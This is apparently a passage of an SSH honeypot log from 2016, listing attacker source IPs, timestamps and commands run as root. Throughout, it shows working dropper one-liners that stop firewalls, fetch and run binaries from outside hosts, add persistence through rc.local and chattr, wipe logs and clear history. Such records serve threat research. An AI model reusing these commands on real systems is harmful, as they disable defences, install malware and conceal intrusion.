stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/China1991;chmod 755 China1991;./China1991; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.5:8080/China1991 chmod 755 China1991 ./China1991 From 222.186.56.5 29-Apr-2016 17:58:59 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/duge_L24;chmod 755 duge_L24;./duge_L24; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.5:8080/duge_L24 chmod 755 duge_L24 ./duge_L24 From 222.186.56.5 30-Apr-2016 14:40:55 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/China1991;chmod 777 China1991;./China1991; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.5:8080/China1991 chmod 777 China1991 ./China1991 From 222.186.56.5 1-May-2016 01:01:53 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.143:801/bbs;chmod 755 bbs;./bbs; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.193.161.143:801/bbs chmod 755 bbs ./bbs From 222.186.58.136 5-May-2016 08:31:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:373/NLUX;chmod 777 NLUX;./NLUX; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.58.136:373/NLUX chmod 777 NLUX ./NLUX From 138.59.211.27 6-May-2016 15:34:27 ssh2 root Exec ls -al; du -h *; df -h; ls -al du -h * df -h From 222.186.34.203 7-May-2016 12:16:23 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 777 Someone915;./Someone915; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.34.203:89/Someone915 chmod 777 Someone915 ./Someone915 From 222.186.34.203 7-May-2016 22:37:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Client;chmod 7777 Client;./Client; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.34.203:89/Client chmod 7777 Client ./Client From 222.186.34.203 8-May-2016 08:58:19 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/chinasyn;chmod 7777 chinasyn;./chinasyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.34.203:89/chinasyn chmod 7777 chinasyn ./chinasyn From 222.186.34.203 8-May-2016 19:19:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 755 Someone915;./Someone915; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.34.203:89/Someone915 chmod 755 Someone915 ./Someone915 From 222.186.58.136 9-May-2016 16:01:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:374/NNTTZ;chmod 777 NNTTZ;./NNTTZ; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.58.136:374/NNTTZ chmod 777 NNTTZ ./NNTTZ From 222.186.56.70 10-May-2016 12:43:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.72:889/Jwebl;chmod 755 Jwebl;./Jwebl; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.72:889/Jwebl chmod 755 Jwebl ./Jwebl From 176.223.34.52 10-May-2016 23:04:07 ssh2 root w uname -a free -m os x ps x rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null history -c w exit From 163.172.154.75 12-May-2016 04:39:01 ssh2 root Exec uname -a ; cat /etc/issue ; uptime uname -a cat /etc/issue uptime From 222.186.21.170 14-May-2016 20:12:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.170:389/TTMX;chmod 777 TTMX;./TTMX; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.170:389/TTMX chmod 777 TTMX ./TTMX From 222.186.21.170 15-May-2016 06:33:47 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.170:389/2916;chmod 777 2916;./2916; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.170:389/2916 chmod 777 2916 ./2916 From 222.186.21.170 15-May-2016 16:54:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.170:389/2915;chmod 777 2915;./2915; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.170:389/2915 chmod 777 2915 ./2915 From 61.216.13.188 18-May-2016 07:00:33 ssh2 root ls ps -ef wget http://117.18.4.70:7777/dafa2016 chmod +x dafa2016 ./dafa2016 chattr +i ps -ef From 219.132.178.139 18-May-2016 17:21:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.97.215.31:8080/dad;chmod 777 dad;./dad; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://180.97.215.31:8080/dad chmod 777 dad ./dad From 39.109.4.162 23-May-2016 21:33:07 ssh2 root Exec wget -P/root/ http://39.109.4.162/escds wget -P/root/ http://39.109.4.162/escds From 39.109.4.162 24-May-2016 07:54:05 ssh2 root Exec /root/escds /root/escds From 174.138.14.128 24-May-2016 14:36:05 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.18/8UsA.sh; curl -O http://82.202.235.18/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.18 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.18; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.18 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf cd /tmp || cd /var/run || cd /mnt wget http://82.202.235.18/8UsA.sh curl -O http://82.202.235.18/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 82.202.235.18 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 82.202.235.18 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf From 27.255.81.37 24-May-2016 18:15:03 ssh2 root uname -a ps -ef passwd sfdgfghkjlkhjghfgdfsdfdgfjhhfgdfdgh From 27.255.81.38 25-May-2016 04:36:01 ssh2 root ps -ef passwd dsfdsgfhjghkjlkhjgfgdfdssfdgfhgfdgf From 51.15.193.245 27-May-2016 10:59:01 ssh2 root Exec : cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.18/8UsA.sh; curl -O http://82.202.235.18/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.18 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.18; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.18 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf : cd /tmp || cd /var/run || cd wget http://82.202.235.18/8UsA.sh curl -O http://82.202.235.18/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 82.202.235.18 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 82.202.235.18 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf From 222.186.21.72 27-May-2016 18:41:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.7.70:88/Liao;chmod 777 Liao;./Liao; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.7.70:88/Liao chmod 777 Liao ./Liao From 222.186.21.72 28-May-2016 05:02:47 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.7.70:88/honest;chmod 777 honest;./honest; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.7.70:88/honest chmod 777 honest ./honest From 222.186.21.72 28-May-2016 15:23:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.7.70:88/honest;chmod 755 honest;./honest; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://123.249.7.70:88/honest chmod 755 honest ./honest From 222.186.21.72 29-May-2016 01:44:43 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.170.45:88/honest;chmod 777 honest;./honest; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.170.45:88/honest chmod 777 honest ./honest From 103.106.98.139 29-May-2016 02:03:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/;rm -rf xm.sh;wget -c http://116.196.120.20:7800/xm.sh;chmod 777 xm.sh;sh xm.sh; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp/ rm -rf xm.sh wget -c http://116.196.120.20:7800/xm.sh chmod 777 xm.sh sh xm.sh From 39.79.106.56 29-May-2016 22:26:39 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/vip -P /tmp/;chmod 0777 /tmp/vip;/tmp/vip; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget http://45.34.1.216:858/vip -P /tmp/ chmod 0777 /tmp/vip /tmp/vip From 39.79.106.56 30-May-2016 19:08:35 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/synn -P /tmp/;chmod 0777 /tmp/synn;/tmp/synn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget http://45.34.1.216:858/synn -P /tmp/ chmod 0777 /tmp/synn /tmp/synn From 39.79.106.56 31-May-2016 05:29:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/ip -P /tmp/;chmod 0777 /tmp/ip;/tmp/ip; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget http://45.34.1.216:858/ip -P /tmp/ chmod 0777 /tmp/ip /tmp/ip From 39.79.106.56 31-May-2016 15:50:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/app -P /tmp/;chmod 0777 /tmp/app;/tmp/app; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget http://45.34.1.216:858/app -P /tmp/ chmod 0777 /tmp/app /tmp/app From 167.114.249.132 31-May-2016 17:33:25 ssh2 root Exec cat /etc/issue && uname -a cat /etc/issue && uname -a From 79.137.39.227 3-Jun-2016 23:42:29 ssh2 root Exec uname -a ; uptime -p uname -a uptime -p From 211.104.160.3 4-Jun-2016 12:59:13 ssh2 root ps -ef wget http://118.184.28.130:7777/2016ttfacai chmod +x 2016ttfacai ./2016ttfacai chattr +i ps -ef From 23.238.184.217 5-Jun-2016 20:02:07 ssh2 root Exec wget http://118.184.28.130:7777/tiantianniu wget http://118.184.28.130:7777/tiantianniu From 121.12.127.125 7-Jun-2016 03:05:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.61.254.103:5198/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.61.254.103:5198/breeb chmod 777 breeb ./breeb From 222.186.56.12 7-Jun-2016 13:25:59 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.12:88/ming;chmod 777 ming;./ming; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.56.12:88/ming chmod 777 ming ./ming From 218.93.208.245 8-Jun-2016 10:07:55 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.93.208.245:5198/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://218.93.208.245:5198/breeb chmod 777 breeb ./breeb From 27.153.31.117 8-Jun-2016 20:28:53 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.184.30.231:5198/shu;chmod 777 shu;./shu; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.184.30.231:5198/shu chmod 777 shu ./shu From 27.153.31.117 9-Jun-2016 17:10:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://122.0.80.183:5198/breeb;chmod 77 /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://122.0.80.183:5198/breeb chmod 77 From 121.12.127.125 10-Jun-2016 13:52:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.127.125:5198/rwd;chmod 777 rwd;./rwd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.127.125:5198/rwd chmod 777 rwd ./rwd From 221.203.142.133 11-Jun-2016 00:13:43 ssh2 root Exec (uname -a) (uname -a) From 174.139.14.34 13-Jun-2016 03:58:33 ssh2 root passwd dsfdhjlkljkjhghfgdfdgjhkfdgfhghfgfg From 27.151.173.32 14-Jun-2016 21:22:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop From 23.238.184.217 20-Jun-2016 11:54:59 ssh2 root Exec wget http://43.240.14.228:7777/niuniu wget http://43.240.14.228:7777/niuniu From 123.206.23.127 22-Jun-2016 05:18:51 ssh2 root ifconfig wget -qO- bench.sh | bash netstat -antp apt-get yum apt-get update sudo apt-get update last lastb ls cd cd / ls cat /proxy.doc From 103.20.249.191 22-Jun-2016 15:39:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://122.0.80.183:5198/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://122.0.80.183:5198/breeb chmod 777 breeb ./breeb From 222.186.21.76 28-Jun-2016 16:33:21 ssh2 root wget http://139.196.191.181:81/1231.rar chmod 777 1231.rar ./1231.rar & From 123.146.82.23 2-Jul-2016 03:21:05 ssh2 root wget http://139.196.191.181:81/sa2 chmod 777 sa2 ./sa2 & chmod 777 1231.rar ./1231.rar & From 222.186.21.76 2-Jul-2016 13:42:03 ssh2 root wget http://139.196.191.181:81/1231.rar chmod 777 1231.rar ./1231.rar & wget http://139.196.191.181:81/sa2 chmod 777 sa2 ./sa2 & From 222.186.21.76 3-Jul-2016 20:44:57 ssh2 root wget http://139.196.191.181:81/123.rar chmod 777 123.rar ./123.rar & From 222.186.21.76 4-Jul-2016 07:05:55 ssh2 root wget http://syna.f3322.net:81/123.rar chmod 777 123.rar ./123.rar & From 86.27.91.145 4-Jul-2016 22:08:37 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.89.52.13/ssh.sh; curl -O http://159.89.52.13/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 159.89.52.13 -c get ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp -r ssh2.sh -g 159.89.52.13; chmod 777 ssh2.sh; sh ssh2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.89.52.13 ssh1.sh ssh1.sh; sh ssh1.sh; rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://159.89.52.13/ssh.sh curl -O http://159.89.52.13/ssh.sh chmod 777 ssh.sh sh ssh.sh tftp 159.89.52.13 -c get ssh.sh chmod 777 ssh.sh sh ssh.sh tftp -r ssh2.sh -g 159.89.52.13 chmod 777 ssh2.sh sh ssh2.sh ftpget -v -u anonymous -p anonymous -P 21 sh ssh1.sh rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh rm -rf * From 86.120.151.199 5-Jul-2016 03:01:41 ssh2 root w ls -a exit From 51.15.193.245 5-Jul-2016 12:47:49 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.20/8UsA.sh; curl -O http://82.202.235.20/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.20 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.20; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.20 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://82.202.235.20/8UsA.sh curl -O http://82.202.235.20/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 82.202.235.20 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 82.202.235.20 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf * From 103.20.249.191 6-Jul-2016 21:11:43 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://122.0.80.183:5198/rwd;chmod 777 rwd;./rwd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://122.0.80.183:5198/rwd chmod 777 rwd ./rwd From 103.20.249.191 9-Jul-2016 11:17:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.20.249.191:5198/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://103.20.249.191:5198/breeb chmod 777 breeb ./breeb From 222.186.190.229 9-Jul-2016 21:38:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.232.89.227:5198/rwd;chmod 777 rwd;./rwd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://103.232.89.227:5198/rwd chmod 777 rwd ./rwd From 23.251.55.90 10-Jul-2016 07:59:27 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.10.172.233:11/syn;chmod 777 syn;./syn;echo "cd /tmp/">>/etc/rc.local;echo "./syn&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://121.10.172.233:11/syn chmod 777 syn ./syn echo "cd /tmp/">>/etc/rc.local echo "./syn&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 37.126.118.79 11-Jul-2016 00:40:37 ssh2 root ls znc exit From 171.213.83.191 12-Jul-2016 01:23:19 ssh2 root uname -a service iptables stop /etc/init.d/iptables stop service iptables stop service iptables stop wget http://112.83.192.246:33066/lin From 91.224.160.108 13-Jul-2016 15:09:49 ssh2 root From 60.10.114.151 14-Jul-2016 01:56:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /usr/bin/;rm -rf xm.sh;wget -c http://116.196.120.20:443/xm.sh;chmod 777 xm.sh;sh xm.sh; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /usr/bin/ rm -rf xm.sh wget -c http://116.196.120.20:443/xm.sh chmod 777 xm.sh sh xm.sh From 182.16.75.218 15-Jul-2016 22:32:01 ssh2 root ifconfig ls netstat -antp ls From 115.231.218.173 18-Jul-2016 22:58:47 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.231.217.109:11315/c32;chmod 777 c32;./c32; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.231.217.109:11315/c32 chmod 777 c32 ./c32 From 115.231.218.173 19-Jul-2016 19:40:43 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.231.217.109:11315/c33;chmod 777 c33;./c33; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.231.217.109:11315/c33 chmod 777 c33 ./c33 From 220.191.208.195 22-Jul-2016 09:46:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/rwd;chmod 777 rwd;./rwd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://211.155.229.230:5198/rwd chmod 777 rwd ./rwd From 115.231.218.173 24-Jul-2016 03:10:23 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.231.220.21:31589/u1;chmod 777 u1;./u1; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.231.220.21:31589/u1 chmod 777 u1 ./u1 From 213.32.88.170 24-Jul-2016 20:49:09 ssh2 root Exec uname -a ; lscpu ; w uname -a lscpu w From 115.231.218.173 25-Jul-2016 10:13:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.230.126.82:11315/u1;chmod 777 u1;./u1; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.230.126.82:11315/u1 chmod 777 u1 ./u1 From 174.138.14.128 30-Jul-2016 13:35:01 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.19/8UsA.sh; curl -O http://82.202.235.19/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.19 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.19; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.19 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf cd /tmp || cd /var/run || cd /mnt wget http://82.202.235.19/8UsA.sh curl -O http://82.202.235.19/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 82.202.235.19 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 82.202.235.19 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf From 220.191.208.195 1-Aug-2016 07:48:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/aiai;chmod 777 aiai;./aiai; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://211.155.229.230:5198/aiai chmod 777 aiai ./aiai From 115.231.218.173 7-Aug-2016 19:03:15 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://36.251.184.196:32156/ss1;chmod 777 ss1;./ss1; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://36.251.184.196:32156/ss1 chmod 777 ss1 ./ss1 From 220.191.208.195 8-Aug-2016 15:45:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://211.155.229.230:5198/breeb chmod 777 breeb ./breeb From 220.191.208.195 10-Aug-2016 09:09:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/ces;chmod 777 ces;./ces; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://211.155.229.230:5198/ces chmod 777 ces ./ces From 220.191.208.195 14-Aug-2016 06:17:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.178.55.106:50668/ces;chmod 777 ces;./ces; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://180.178.55.106:50668/ces chmod 777 ces ./ces From 220.191.208.195 15-Aug-2016 13:20:39 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.178.55.106:50668/beeb;chmod 777 beeb;./beeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://180.178.55.106:50668/beeb chmod 777 beeb ./beeb From 118.193.189.229 15-Aug-2016 23:41:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.189.229:8080/sgg;chmod 777 sgg;./sgg; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.193.189.229:8080/sgg chmod 777 sgg ./sgg From 118.193.189.229 16-Aug-2016 20:23:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.189.229:8080/sg;chmod 777 sg;./sg; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.193.189.229:8080/sg chmod 777 sg ./sg From 139.204.24.57 19-Aug-2016 00:08:23 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.34.162:8080/Lin3.6;chmod 777 Lin3.6;./Lin3.6;echo "cd /tmp/">>/etc/rc.local;echo "./Lin3.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 